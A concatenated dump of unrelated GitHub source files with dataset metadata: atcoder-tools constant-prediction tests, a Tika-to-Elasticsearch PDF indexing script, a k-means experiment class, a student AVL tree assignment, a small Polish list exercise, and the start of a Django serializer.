test_yes_no_prediction_fails_when_failing_to_parse_html(self):\n try:\n predict_yes_no(\"broken html\")\n self.fail(\"Must not reach here\")\n except YesNoPredictionFailedError:\n pass\n\n def test_case_only_with_no_str(self):\n yes_str, no_str = predict_yes_no(self._load(\"agc001-D.html\"))\n self.assertEqual(None, yes_str)\n self.assertEqual(\"Impossible\", no_str)\n\n def test_predict_time_limit(self):\n timeout = predict_limit(self._load(\"dwacon2017-prelims-A.html\"))\n self.assertEqual(timeout, 2525)\n timeout = predict_limit(self._load(\"dwacon2017-prelims-E.html\"))\n self.assertEqual(timeout, 5252)\n\n @unittest.expectedFailure\n def test_tricky_mod_case_that_can_raise_multi_cands_error(self):\n # This test exists in order to demonstrate the current wrong behavior that throws MultipleModCandidatesError.\n # None is the true answer for ABC103-C. This test shouldn't fail with a better prediction method.\n # Please remove @unittest.expectedFailure when predict_modulo() behaves\n # correctly.\n\n modulo = predict_modulo(self._load(\"abc103-C.html\"))\n self.assertIsNone(modulo)\n\n @unittest.expectedFailure\n def test_tricky_yes_no_case_difficult_to_recognize(self):\n # This test exists in order to demonstrate the current wrong behavior that doesn't detect some yes/no strings.\n # Please remove @unittest.expectedFailure when predict_yes_no() behaves\n # correctly.\n\n yes_str, no_str = predict_yes_no(self._load(\"abc110-B.html\"))\n self.assertEqual(\"War\", yes_str)\n self.assertEqual(\"No War\", no_str)\n\n def test_relative_or_absolute_error_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n

    出力

    \\\\frac{1}{\\\\frac{1}{A_1} + \\ldots + \\\\frac{1}{A_N}} の値を表す小数 (または整数) を出力せよ。

    \n

    出力は、ジャッジの出力との絶対誤差または相対誤差が 10^{-5} 以下のとき正解と判定される。

    \n
    \"\"\")\n self.assertEqual(0.00001, judge_method.to_dict()[\"diff\"])\n self.assertEqual(JudgeType.Decimal.value,\n judge_method.to_dict()[\"judge_type\"])\n self.assertEqual(ErrorType.AbsoluteOrRelative.value,\n judge_method.to_dict()[\"error_type\"])\n\n def test_absolute_error_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n

    出力

    \n
    \n 入力に基づいて逆算した 体重 [kg] を一行に出力せよ。
    \n 出力は絶対誤差が 10^{−2} 以下であれば許容される。
    \n なお、出力の最後には改行を入れること。\n
    \n
    \"\"\")\n self.assertEqual(0.01, judge_method.to_dict()[\"diff\"])\n self.assertEqual(JudgeType.Decimal.value,\n judge_method.to_dict()[\"judge_type\"])\n self.assertEqual(ErrorType.Absolute.value,\n judge_method.to_dict()[\"error_type\"])\n\n def test_relative_error_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n
    \n

    出力

    すべての寿司が無くなるまでの操作回数の期待値を出力せよ。\n 相対誤差が 10^{-9} 以下ならば正解となる。

    \n
    \n
    \n \"\"\")\n self.assertEqual(0.000000001, judge_method.to_dict()[\"diff\"])\n self.assertEqual(JudgeType.Decimal.value,\n judge_method.to_dict()[\"judge_type\"])\n self.assertEqual(ErrorType.Relative.value,\n judge_method.to_dict()[\"error_type\"])\n\n def test_normal_judge_method_case(self):\n judge_method = predict_judge_method(\n \"\"\"\n
    \n
    \n

    出力

    N! の正の約数の個数を 10^9+7 で割った余りを出力せよ。

    \n
    \n
    \n \"\"\")\n self.assertEqual(JudgeType.Normal.value,\n judge_method.to_dict()[\"judge_type\"])\n\n def test_judge_method_prediction_fails_with_multiple_cands(self):\n try:\n predict_judge_method(\n \"10^{-6} もしくは 10^{-5}以下の相対誤差\")\n self.fail(\"Must not reach here\")\n except MultipleDecimalCandidatesError:\n pass\n\n @unittest.expectedFailure\n def test_tricky_judge_method_case(self):\n # This test exists in order to demonstrate the current wrong behavior that detects unrelated mention wrongly.\n # Please remove @unittest.expectedFailure when predict_judge_method() behaves\n # correctly.\n judge_method = predict_judge_method(\n \"\"\"\n
    \n
    \n

    問題文

    N 人のクラスがあり、色 1,2,...,M の中から 1 つの色を選んでテーマカラーを決めることとなりました。

    \n

    それぞれの人が同確率でどれかの色 1 つに投票するとき、色 i(1 \\leq i \\leq M)r_i 票集まる確率を p とします。

    \n

    p \\geq 10^{-x} を満たす最小の整数 x を求めてください。

    \n

    ただし、p10^{-6} 以下の相対誤差が生じても x は変わらないことが保証されるものとします。

    \n
    \n
    \"\"\")\n self.assertEqual(JudgeType.Normal.value,\n judge_method.to_dict()[\"judge_type\"])\n\n def _load(self, html_path):\n with open(os.path.join(self.test_dir, html_path), 'r') as f:\n return f.read()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kyuridenamida/atcoder-tools","sub_path":"tests/test_constpred.py","file_name":"test_constpred.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":367,"dataset":"github-code","pt":"37"} +{"seq_id":"24174597797","text":"#!/usr/bin/env python\nimport logging\nimport os\n#import tika\nimport logging\nimport concurrent.futures\nfrom tika import parser, unpack\nfrom elasticsearch import Elasticsearch\n\"\"\"\nUse pytika from https://github.com/chrismattmann/tika-python to parse documents using tika server.\nTika server can be run as a docker image as described here: https://github.com/apache/tika-docker\nAuthor: Praveen Chamarthi\n\"\"\"\nDOC_PATH = '/path/to/documents/'\nTIKA_URL = \"http://localhost:9998/tika\"\nINDEX_NAME = \"knowledgeindex\"\nDOC_EXTENSION = \"pdf\"\n\ndef connect_elasticsearch(host=\"localhost\", port=\"9200\"):\n \"\"\" Function that returns a connection object. \n \n Arguments:\n host {str} -- Hostname (default is localhost)\n port {str} -- Portnumber (default is 9200)\n \"\"\"\n _es = None\n _es = Elasticsearch([{'host': host, 'port': port}])\n if _es.ping():\n logging.info('Connected...')\n else:\n logging.error(f\"Error connecting to ES Cluster: {host}:{port}\")\n return _es\n\ndef create_index(es_object, index_name=INDEX_NAME):\n \"\"\"\n Create a strict index mappings based on document metadata returned by tika.\n Also create a custom analyzer with an edge_ngram filter\n Refer to metadata-tika-sample.json for sample metadata fields returned\n\n Arguments:\n es_object {Object} -- Instance of elasticsearch connection object\n index_name {str} -- Name of elasticsearch index to create\n \"\"\"\n created = False\n # index settings\n \"\"\"\n IMPORTANT: mapping type is deprecated from es v7.0.0 and above\n https://www.elastic.co/guide/en/elasticsearch/reference/7.7/removal-of-types.html\n \"\"\"\n settings = {\n \"settings\": {\n \"number_of_shards\": 1,\n \"number_of_replicas\": 2,\n \"analysis\": {\n \"filter\": {\n \"autocomplete_filter\": {\n \"type\": \"edge_ngram\",\n \"min_gram\": 1,\n \"max_gram\": 20\n }\n },\n \"analyzer\":{\n \"autocomplete\": {\n \"type\": \"custom\",\n \"tokenizer\": \"standard\",\n \"filter\": [\n \"lowercase\",\n \"autocomplete_filter\"\n ]\n }\n }\n }\n },\n \"mappings\": {\n \"properties\": {\n \"title\": {\"type\": \"text\" },\n \"description\": {\"type\": \"text\" },\n \"author\": {\"type\": \"text\" },\n \"creation_date\": {\"type\": \"date\" },\n \"content_type\": {\"type\": \"text\" },\n \"keywords\": {\"type\": \"text\" },\n \"num_pages\": {\"type\": \"integer\" },\n \"filename\": {\"type\": \"text\" },\n \"content\": {\"type\": \"text\" }\n }\n }\n }\n try:\n if not es_object.indices.exists(INDEX_NAME):\n # Ignore 400 means to ignore \"Index Already Exist\" error.\n es_object.indices.create(index=INDEX_NAME, ignore=400, body=settings)\n logging.info('Created Index')\n created = True\n except Exception as ex:\n logging.error(f\"Error creating Index: {ex}\")\n finally:\n return created\n\ndef prepare_index_record(document_path, tika_url=TIKA_URL):\n \"\"\"\n Prepares the record object (dict) after querying tika using the unpack.\n Unpack returns metadata and content in the response dict.\n\n Arguments:\n document_path {str} -- Full Path to the document to be sent to tika\n tika_url {str} -- (optional) full url to tika server\n \"\"\"\n parsed = unpack.from_file(document_path, tika_url)\n metadata = parsed[\"metadata\"]\n content = parsed[\"content\"]\n title = \"NoTitle\"\n if title == \"NoTitle\":\n title = metadata.get(\"title\", \"NoTitle\")\n elif title == \"NoTitle\":\n title = metadata.get(\"dc:title\", \"NoTitle\")\n else:\n title = metadata.get(\"pdf.docinfo:title\", \"NoTitle\")\n author = \"NoAuthor\"\n if author == \"NoAuthor\":\n author = metadata.get(\"Author\", \"NoAuthor\")\n elif author == \"NoAuthor\":\n author = metadata.get(\"meta:author\", \"NoAuthor\")\n\n subject = metadata.get(\"subject\", \"NoSubject\")\n keywords = \"NoKeywords\"\n if keywords == \"NoKeywords\":\n keywords = metadata.get(\"Keywords\", \"NoKeywords\")\n elif keywords == \"NoKeywords\":\n keywords = metadata.get(\"meta:keyword\", \"NoKeywords\")\n elif keywords == \"NoKeywords\":\n keywords = metadata.get(\"pdf.docinfo:keywords\", \"NoKeywords\")\n resourcename = metadata.get(\"resourceName\", \"NoResourceName\")\n record = {\n \"title\": title,\n \"description\": subject,\n \"author\": author,\n \"creation_date\": metadata[\"Creation-Date\"],\n \"content_type\": metadata[\"Content-Type\"],\n \"keywords\": keywords,\n \"num_pages\": metadata[\"xmpTPg:NPages\"],\n \"filename\": resourcename,\n \"content\": content\n }\n return record\n\ndef add_record_to_index(elastic_connection, \n document_path, \n tika_url=TIKA_URL, \n index_name=INDEX_NAME):\n \"\"\"\n Sends document(record) to elasticsearch for index.\n\n Arguments:\n elastic_connection {object} -- connection object to elasticsearch\n document_path {str} -- Full Path to the document to be sent to tika\n tika_url {str} -- URI to tika server e.g. http://localhost:9998/tika\n index_name {str} -- name of the elasticsearch index\n \"\"\"\n record = prepare_index_record(document_path, tika_url)\n try:\n index_confirmation=elastic_connection.index(index=index_name, body=record)\n except Exception as exc:\n logging.error(f\"{document_path} Error indexing data {exc}\")\n return index_confirmation\n\ndef get_documents(path_to_scan):\n \"\"\"\n returns a list of paths (FQDN) of all documents under the top level directory.\n\n Arguments:\n path_to_scan {str} -- Full Path to the top level directory where the documents reside\n \"\"\"\n for (dirpath, _, filenames) in os.walk(path_to_scan):\n full_names = [os.path.join(dirpath, fn) for fn in filenames if fn.endswith(DOC_EXTENSION)]\n break\n return full_names\n\ndef create_logger():\n \"\"\" Basic logger to write to console and to a file for debug info. \"\"\"\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename='DEBUG.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n\nif __name__ == \"__main__\":\n create_logger()\n logging.info(f\"Connecting to ES ...\")\n es_conn = connect_elasticsearch()\n if not es_conn.indices.exists(INDEX_NAME):\n logging.info(f\"Creating index {INDEX_NAME} ...\")\n create_index(es_conn)\n else:\n logging.info(f\"Skipping Index creation... {INDEX_NAME} already exists\")\n if os.path.exists(DOC_PATH):\n logging.info(f\"Scanning DIR: {DOC_PATH} ...\")\n full_names = get_documents(DOC_PATH)\n if not full_names:\n logging.info(f\"No docs with extension: {DOC_EXTENSION} found under: {DOC_PATH}\")\n else:\n logging.error(f\"Path: {DOC_PATH} doesn't exist\")\n exit\n\n # Use ThreadPoolExecutor to index documents in parallel with 5 workers\n with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n future_to_kdoc = {executor.submit(add_record_to_index, es_conn, kdoc, TIKA_URL): kdoc for kdoc in full_names}\n # print(future_to_kdoc)\n for future in concurrent.futures.as_completed(future_to_kdoc):\n kdoc = future_to_kdoc[future]\n logging.info(f\"Indexing: {kdoc}...\")\n try:\n data = future.result()\n except Exception as exc:\n logging.error(\"Indexing %r generated an exception: %s\" % (kdoc, exc))\n else:\n logging.info(\"document %s indexed successfully\" % (kdoc))\n\n\n","repo_name":"praveenc/elasticsearch-python","sub_path":"elasticsearch-apachetika/es-indexdocs-tika.py","file_name":"es-indexdocs-tika.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39893230745","text":"#!/usr/bin/python\n\"\"\"\nclusters\ncentres\naverages(distance/area)[]\ndistance\n\n\nExperimentInstance is the class to help us extract information from a series of experiment runs.\n\"\"\"\nfrom lib.scripts.experiment_cluster import *\nfrom lib.scripts.experiment_utils import distance\nimport sys\n\nclass ExperimentInstance:\n \"\"\"\n returns an array of arrays corresponding to the point positions of every centre\n in the experiment run. These pointpositions are disjoint and are calculated based\n on the closest points to each centre.\n \"\"\"\n def calcPointPositions(self):\n result = [[] for _ in range(len(self.centres))]\n for instId in range(len(ExperimentInstance.dataset)):\n currCandidateCentreId = 0\n minDistance = sys.float_info.max\n for centreId in range(len(self.centres)):\n currDistance = distance(ExperimentInstance.dataset[instId], self.centres[centreId])\n if minDistance > currDistance:\n minDistance = currDistance\n currCandidateCentreId = centreId\n result[currCandidateCentreId].append(instId)\n return result\n\n def __init__(self, centres, algorithm, totalDistanceToCentres, seedPickingTime, numIterations, iterationsRuntime):\n assert hasattr(ExperimentInstance, 'dataset')\n self.centres = centres\n self.algorithm = algorithm\n self.totalDistanceToCentres = totalDistanceToCentres\n self.seedPickingTime = seedPickingTime\n self.numIterations = numIterations\n self.iterationsRuntime = iterationsRuntime\n self.clusters = []\n pointPositions = self.calcPointPositions()\n for centre, p in zip(self.centres, pointPositions):\n self.clusters.append(Cluster(centre, p))\n self.averageDistancesOverArea_ = None\n\n @property\n def averageDistancesOverArea(self):\n if self.averageDistancesOverArea_ == None:\n self.averageDistancesOverArea_ = [c.totalDistance / c.area for c in self.clusters]\n return self.averageDistancesOverArea_\n\n\n\n def centresToString(self):\n result = \"\"\n for inst in self.centres:\n result += str(inst[0]) + \" \" + str(inst[1]) + \"\\n\"\n return result\n\n def __str__(self):\n return (\">>>Start Experiment\\n\" +\n \"algorithm:\" + self.algorithm + \"\\n\" +\n \"Sum of distance squared to centre:\" + str(self.totalDistanceToCentres) + \"\\n\" +\n \"Time to pick the seeds:\" + str(self.seedPickingTime) + \"\\n\" +\n \"Number of iterations run:\" + str(self.numIterations) + \"\\n\" +\n \"Time to run the iterations:\" + str(self.iterationsRuntime) + \"\\n\" +\n \"Start Centres:\\n\" + self.centresToString() +\n \"End Centres:\\n\" +\n \"End Experiment:\"\n )\n","repo_name":"technoligest/kmeansII","sub_path":"lib/scripts/experiment_instance.py","file_name":"experiment_instance.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37171165951","text":"# Name: Robert Smith\n# OSU Email: Smithro8@oregonstate.edu\n# Course: CS261 - Data Structures\n# Assignment: 4\n# Due Date: 02/27/2023\n# Description: Creates an AVL Tree (balancing tree). Has methods for remove and add,\n# with helper methods to facilitate those functions.\n\nimport random\nfrom queue_and_stack import Queue, Stack\nfrom bst import BSTNode, BST\n\n\nclass AVLNode(BSTNode):\n \"\"\"\n AVL Tree Node class. Inherits from BSTNode\n DO NOT CHANGE THIS CLASS IN ANY WAY\n \"\"\"\n\n def __init__(self, value: object) -> None:\n \"\"\"\n Initialize a new AVL node\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n # call __init__() from parent class\n super().__init__(value)\n # new variables needed for AVL\n self.parent = None\n self.height = 0\n\n def __str__(self) -> str:\n \"\"\"\n Override string method\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n return 'AVL Node: {}'.format(self.value)\n\n\nclass AVL(BST):\n \"\"\"\n AVL Tree class. Inherits from BST\n \"\"\"\n\n def __init__(self, start_tree=None) -> None:\n \"\"\"\n Initialize a new AVL Tree\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n # call __init__() from parent class\n super().__init__(start_tree)\n\n def __str__(self) -> str:\n \"\"\"\n Override string method\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n values = []\n super()._str_helper(self._root, values)\n return \"AVL pre-order { \" + \", \".join(values) + \" }\"\n\n def is_valid_avl(self) -> bool:\n \"\"\"\n Perform pre-order traversal of the tree. Return False if there\n are any problems with attributes of any of the nodes in the tree.\n This is intended to be a troubleshooting 'helper' method to help\n find any inconsistencies in the tree after the add() or remove()\n operations. Review the code to understand what this method is\n checking and how it determines whether the AVL tree is correct.\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n stack = Stack()\n stack.push(self._root)\n while not stack.is_empty():\n node = stack.pop()\n if node:\n # check for correct height (relative to children)\n left = node.left.height if node.left else -1\n right = node.right.height if node.right else -1\n if node.height != 1 + max(left, right):\n print(\"height\")\n return False\n if node.parent:\n # parent and child pointers are in sync\n if node.value < node.parent.value:\n check_node = node.parent.left\n else:\n check_node = node.parent.right\n if check_node != node:\n print(\"p/c pointers\")\n return False\n else:\n # NULL parent is only allowed on the root of the tree\n if node != self._root:\n print(\"null parent\")\n return False\n stack.push(node.right)\n stack.push(node.left)\n return True\n\n # ------------------------------------------------------------------ #\n def add(self, value: object) -> None:\n \"\"\"\n Adds a passed value to AVL\n Creates tree if empty\n Rebalcances after add\n \"\"\"\n\n # if empty\n if self._root is None:\n self._root = AVLNode(value)\n return\n # if repeat value\n if value == self._root.value:\n return\n # iterates to end node\n node = self._root\n parent_node = None\n while node is not None:\n parent_node = node\n if value == node.value:\n return\n if value < node.value:\n node = node.left\n else:\n node = node.right\n # assigns proper node and parent\n if value < parent_node.value:\n parent_node.left = AVLNode(value)\n parent_node.left.parent = parent_node\n if value > parent_node.value:\n parent_node.right = AVLNode(value)\n parent_node.right.parent = parent_node\n # rebalance from parent node up\n while parent_node is not None:\n self._rebalance(parent_node)\n parent_node = parent_node.parent\n\n def remove(self, value: object) -> bool:\n \"\"\"\n Removes a passed value and returns ture if removed\n Else returns false\n Rebalances after removal\n \"\"\"\n # if empty\n if self._root is None:\n return False\n # calls find remove node and parent\n remove_node, remove_parent = self.find_remove_node(value)\n # if value not found in tree\n if remove_node is None:\n return False\n # no children\n if remove_node.left is None and remove_node.right is None:\n self._remove_no_subtrees(remove_parent, remove_node)\n self._remove_rebalance(remove_node)\n return True\n # one subtree\n if remove_node.left is not None and remove_node.right is None or \\\n remove_node.left is None and remove_node.right is not None:\n self._remove_one_subtree(remove_parent, remove_node)\n # points remove nodes subtree to parent\n if remove_node.right is not None:\n remove_node.right.parent = remove_parent\n else:\n remove_node.left.parent = remove_parent\n self._remove_rebalance(remove_parent)\n return True\n # two subtrees\n if remove_node.left is not None and remove_node.right is not None:\n successor_parent = self._remove_two_subtrees(remove_parent, remove_node)\n # rebalance from successor parent up\n self._remove_rebalance(successor_parent)\n return True\n else:\n return False\n\n def _remove_two_subtrees(self, remove_parent: AVLNode, remove_node: AVLNode) -> AVLNode:\n \"\"\"\n removes node that has two subtrees\n changes pointers to proper parent/child\n \"\"\"\n # calls finds successor and parent\n successor, successor_parent = self.find_successor(remove_node)\n if successor_parent is None:\n successor_parent = successor\n # if root\n if self._root == remove_node:\n # if root successor is roots right node\n if self._root.right == successor:\n self._root.value = successor.value\n self._root.right = successor.right\n return successor_parent\n if self._root.right != successor:\n self._root.value = successor.value\n successor_parent.left = successor.right\n if successor.right is not None:\n successor.right.parent = successor_parent\n successor.right = None\n return successor_parent\n # assigns remove left to successor left and parent pointer\n successor.left = remove_node.left\n successor.left.parent = successor\n if successor != remove_node.right:\n # replaces successor with its right\n successor_parent.left = successor.right\n if successor.right is not None:\n successor.right.parent = successor_parent\n # successor gets remove's right and parent\n successor.right = remove_node.right\n remove_node.right.parent = successor\n # reassign successor parent if its parent is remove node\n if successor_parent.parent == remove_node:\n successor_parent.parent = successor\n successor.parent = remove_parent.parent\n # assigns successor pointer to remove parent\n successor.parent = remove_parent\n # assigns successor to proper parent node\n if remove_parent.value < successor.value:\n remove_parent.right = successor\n else:\n remove_parent.left = successor\n return successor_parent\n\n def _remove_rebalance(self, parent_node: AVLNode):\n \"\"\"\n Rebalances from past node all the way to root\n \"\"\"\n while parent_node is not None:\n self._rebalance(parent_node)\n parent_node = parent_node.parent\n\n def _balance_factor(self, node: AVLNode) -> int:\n \"\"\"\n Returns the balacne factor of the node passed\n \"\"\"\n return self._get_height(node.right) - self._get_height(node.left)\n\n def _get_height(self, node: AVLNode) -> int:\n \"\"\"\n Gets the height of the node passed\n \"\"\"\n # recursively adds the height of nodes, returns max\n if node is None:\n return -1\n left_height = self._get_height(node.left)\n right_height = self._get_height(node.right)\n return max(left_height, right_height) + 1\n\n def _rotate_left(self, node: AVLNode) -> AVLNode:\n \"\"\"\n Returns a node after single left rotation around the node passed\n \"\"\"\n child = node.right\n node.right = child.left\n if node.right is not None:\n node.right.parent = node\n child.left = node\n node.parent = child\n self._update_height(node)\n self._update_height(child)\n return child\n\n def _rotate_right(self, node: AVLNode) -> AVLNode:\n \"\"\"\n Returns a node after single right rotation around the node passed\n \"\"\"\n child = node.left\n node.left = child.right\n if node.left is not None:\n node.left.parent = node\n child.right = node\n node.parent = child\n self._update_height(node)\n self._update_height(child)\n return child\n\n def _update_height(self, node: AVLNode) -> None:\n \"\"\"\n Sets the nodes height\n \"\"\"\n\n node.height = max(self._get_height(node.left), self._get_height(node.right)) + 1\n\n def _rebalance(self, node: AVLNode) -> None:\n \"\"\"\n Rebalances the node passed (LL,RR,LR,RL)\n \"\"\"\n\n if self._balance_factor(node) < -1:\n if self._balance_factor(node.left) > 0:\n node.left = self._rotate_left(node.left)\n node.left.parent = node\n # saves nodes parent\n previous_node_parent = node.parent\n new_subtree_root = self._rotate_right(node)\n # assigns rotated node to parent\n new_subtree_root.parent = previous_node_parent\n # if root\n if previous_node_parent is None:\n self._root = new_subtree_root\n return\n # assigns node to parent L/R\n if previous_node_parent.value > new_subtree_root.value:\n previous_node_parent.left = new_subtree_root\n else:\n previous_node_parent.right = new_subtree_root\n elif self._balance_factor(node) > 1:\n if self._balance_factor(node.right) < 0:\n node.right = self._rotate_right(node.right)\n node.right.parent = node\n # saves nodes parent\n previous_node_parent = node.parent\n new_subtree_root = self._rotate_left(node)\n # assigns rotated node to parent\n new_subtree_root.parent = previous_node_parent\n # if root\n if previous_node_parent is None:\n self._root = new_subtree_root\n return\n # assigns node to parent L/R\n if previous_node_parent.value > new_subtree_root.value:\n previous_node_parent.left = new_subtree_root\n else:\n previous_node_parent.right = new_subtree_root\n else:\n self._update_height(node)\n\n\n# ------------------- BASIC TESTING -----------------------------------------\nif __name__ == '__main__':\n # print(\"\\nPDF - method add() example 1\")\n # # -27, -77, -97, -54, 26, 23, 15, 75, 60, 88 right answer\n # print(\"----------------------------\")\n # test_cases = (\n # (1,2,3), # RR\n # (3, 2, 1), # LL\n # (1, 3, 2), # RL\n # (3, 1, 2), # LR\n # )\n # for case in test_cases:\n # tree = AVL(case)\n # print(tree)\n # print(\"\\nPDF - method add() example 2\")\n # print(\"----------------------------\")\n # test_cases = (\n # (10, 20, 30, 40, 50), # RR, RR\n # (10, 20, 30, 50, 40), # RR, RL\n # (30, 20, 10, 5, 1), # LL, LL\n # (30, 20, 10, 1, 5), # LL, LR\n # (5, 4, 6, 3, 7, 2, 8), # LL, RR\n # (range(0, 30, 3)),\n # (range(0, 31, 3)),\n # (range(0, 34, 3)),\n # (range(10, -10, -2)),\n # ('A', 'B', 'C', 'D', 'E'),\n # (1, 1, 1, 1),\n # )\n # for case in test_cases:\n # tree = AVL(case)\n # print('INPUT :', case)\n # print('RESULT :', tree)\n # print(\"\\nPDF - method add() example 3\")\n # print(\"----------------------------\")\n # for _ in range(100):\n # case = list(set(random.randrange(1, 20000) for _ in range(900)))\n # tree = AVL()\n # for value in case:\n # tree.add(value)\n # if not tree.is_valid_avl():\n # raise Exception(\"PROBLEM WITH ADD OPERATION\")\n # print('add() stress test finished')\n print(\"\\nPDF - method remove() example 1\")\n print(\"-------------------------------\")\n test_cases = (\n ((1, 2, 3), 2), # no AVL rotation\n ((1, 2, 3), 1), # no AVL rotation\n ((1, 2, 3), 3), # no AVL rotation\n ((50, 40, 60, 30, 70, 20, 80, 45), 0),\n ((50, 40, 60, 30, 70, 20, 80, 45), 45), # no AVL rotation\n ((50, 40, 60, 30, 70, 20, 80, 45), 40), # no AVL rotation\n ((50, 40, 60, 30, 70, 20, 80, 45), 30), # no AVL rotation\n )\n for case, del_value in test_cases:\n tree = AVL(case)\n print('INPUT :', tree, \"DEL:\", del_value)\n tree.remove(del_value)\n print('RESULT :', tree)\n print(\"\\nPDF - method remove() example 2\")\n print(\"-------------------------------\")\n test_cases = (\n ((-94, 5, 27, -23, 28, 17, -14, 21, -37, 60), -94), # RR\n (( 5, -23, -37, -14, 27, 17, 21, 28, 60), 27), # LL\n ((5, -23, -37, -14, 21, 17, 28, 60), 28), # RL\n\n )\n for case, del_value in test_cases:\n tree = AVL(case)\n print('INPUT :', tree, \"DEL:\", del_value)\n tree.remove(del_value)\n print('RESULT :', tree)\n print(\"\\nPDF - method remove() example 3\")\n print(\"-------------------------------\")\n case = range(-9, 16, 2)\n tree = AVL(case)\n for del_value in case:\n print('INPUT :', tree, del_value)\n tree.remove(del_value)\n print('RESULT :', tree)\n print(\"\\nPDF - method remove() example 4\")\n print(\"-------------------------------\")\n case = [-24, 73, -84, 49, 51, 19, 58, -37, -68, 95]\n remove = [-24]\n tree = AVL(case)\n for x in remove:\n\n print('INPUT :', tree, x)\n tree.remove(x)\n print('RESULT :', tree)\n # print(\"\\nPDF - method remove() example 5\")\n # print(\"-------------------------------\")\n # for _ in range(100):\n # case = list(set(random.randrange(1, 20000) for _ in range(900)))\n # tree = AVL(case)\n # for value in case[::2]:\n # tree.remove(value)\n # if not tree.is_valid_avl():\n # raise Exception(\"PROBLEM WITH REMOVE OPERATION\")\n # print('remove() stress test finished')\n # print(\"\\nPDF - method contains() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 5, 15])\n # print(tree.contains(15))\n # print(tree.contains(-10))\n # print(tree.contains(15))\n # print(\"\\nPDF - method contains() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL()\n # print(tree.contains(0))\n # print(\"\\nPDF - method inorder_traversal() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(tree.inorder_traversal())\n # print(\"\\nPDF - method inorder_traversal() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL([8, 10, -4, 5, -1])\n # print(tree.inorder_traversal())\n # print(\"\\nPDF - method find_min() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(tree)\n # print(\"Minimum value is:\", tree.find_min())\n # print(\"\\nPDF - method find_min() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL([8, 10, -4, 5, -1])\n # print(tree)\n # print(\"Minimum value is:\", tree.find_min())\n # print(\"\\nPDF - method find_max() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(tree)\n # print(\"Maximum value is:\", tree.find_max())\n # print(\"\\nPDF - method find_max() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL([8, 10, -4, 5, -1])\n # print(tree)\n # print(\"Maximum value is:\", tree.find_max())\n # print(\"\\nPDF - method is_empty() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(\"Tree is empty:\", tree.is_empty())\n # print(\"\\nPDF - method is_empty() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL()\n # print(\"Tree is empty:\", tree.is_empty())\n # print(\"\\nPDF - method make_empty() example 1\")\n # print(\"---------------------------------\")\n # tree = AVL([10, 20, 5, 15, 17, 7, 12])\n # print(\"Tree before make_empty():\", tree)\n # tree.make_empty()\n # print(\"Tree after make_empty(): \", tree)\n # print(\"\\nPDF - method make_empty() example 2\")\n # print(\"---------------------------------\")\n # tree = AVL()\n # print(\"Tree before make_empty():\", tree)\n # tree.make_empty()\n # print(\"Tree after make_empty(): \", tree)\n","repo_name":"RobertSmith2727/261_Assignment_4_Assignment-4_BST-AVL_Tree_Implementation","sub_path":"avl.py","file_name":"avl.py","file_ext":"py","file_size_in_byte":18087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19463017003","text":"'''\nNapisz program zamieniający miejscami w zadanej liście liczb element największy z najmniejszym.\n\nna wejsciu: [49, 50, 20, 40, 35, 10]\n\nna wyjsciu: [49, 10, 20, 40, 35, 50]\n'''\n\nlista = [49, 50, 20, 40, 35, 10]\n\nmax_listy = max(lista)\nmin_listy = min(lista)\npierwszy_index_max_listy = lista.index(max_listy)\ndel lista[lista.index(max_listy)]\nlista.insert(lista.index(min_listy), max_listy)\ndel lista[lista.index(min_listy)]\nlista.insert(pierwszy_index_max_listy, min_listy)\n\nprint(lista)\n","repo_name":"Mati675/python_zadania","sub_path":"homework_1_mz/zad_2_5.py","file_name":"zad_2_5.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71102889709","text":"from rest_framework import serializers\nfrom .models import Sequence, User\n\nclass SequenceSerializer(serializers.ModelSerializer): # serializers.ModelSerializer just tells django to convert sql to JSON\n class Meta:\n model = Sequence # tell django which model to use\n fields = (\n 'id',\n 'name',\n 'tempo',\n \n 'poly0Steps',\n 'poly0Synth',\n 'poly0Volume',\n 'poly0Filter',\n 'poly0Dist',\n 'poly0Reverb',\n 'poly0Delay',\n\n 'poly1Steps',\n 'poly1Synth',\n 'poly1Volume',\n 'poly1Filter',\n 'poly1Dist',\n 'poly1Reverb',\n 'poly1Delay',\n\n 'poly2Steps',\n 'poly2Synth',\n 